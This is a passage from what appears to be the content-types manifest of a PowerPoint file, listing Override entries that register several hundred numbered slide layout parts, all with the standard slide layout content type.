  <Override PartName="/ppt/slideLayouts/slideLayout2310.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2311.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2312.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2313.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2314.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2315.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2316.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2317.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2318.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2319.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout232.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2320.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2321.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2322.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2323.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2324.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2325.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2326.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2327.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2328.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2329.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout233.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2330.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2331.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2332.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2333.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2334.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2335.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2336.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2337.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2338.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2339.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout234.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2340.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2341.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2342.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2343.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2344.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2345.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2346.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2347.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2348.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2349.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout235.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2350.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2351.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2352.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2353.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2354.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2355.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2356.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2357.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2358.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2359.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout236.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2360.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2361.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2362.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2363.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2364.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2365.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2366.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2367.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2368.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2369.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout237.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2370.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2371.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2372.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2373.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2374.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2375.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2376.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2377.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2378.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2379.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout238.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2380.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2381.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2382.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2383.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2384.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2385.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2386.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2387.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2388.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2389.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout239.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2390.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2391.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2392.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2393.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2394.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2395.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2396.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2397.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2398.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2399.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout240.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2400.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2401.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2402.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2403.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2404.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2405.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2406.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2407.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2408.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2409.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout241.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2410.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2411.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2412.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2413.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2414.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2415.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2416.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2417.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2418.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2419.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout242.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2420.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2421.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2422.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2423.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2424.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2425.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2426.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2427.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2428.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2429.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout243.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2430.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2431.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2432.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2433.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2434.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2435.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2436.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2437.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2438.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2439.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout244.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2440.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2441.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2442.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2443.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2444.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2445.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2446.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2447.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2448.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2449.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout245.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2450.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2451.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2452.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2453.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2454.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2455.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2456.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2457.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2458.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2459.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout246.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2460.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2461.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2462.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2463.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2464.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2465.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2466.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2467.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2468.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2469.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout247.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2470.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2471.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2472.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2473.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2474.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2475.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2476.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2477.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2478.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2479.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout248.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2480.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2481.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2482.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2483.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2484.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2485.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2486.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2487.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2488.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2489.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout249.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2490.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2491.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2492.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2493.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2494.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2495.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2496.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2497.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2498.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2499.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout250.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
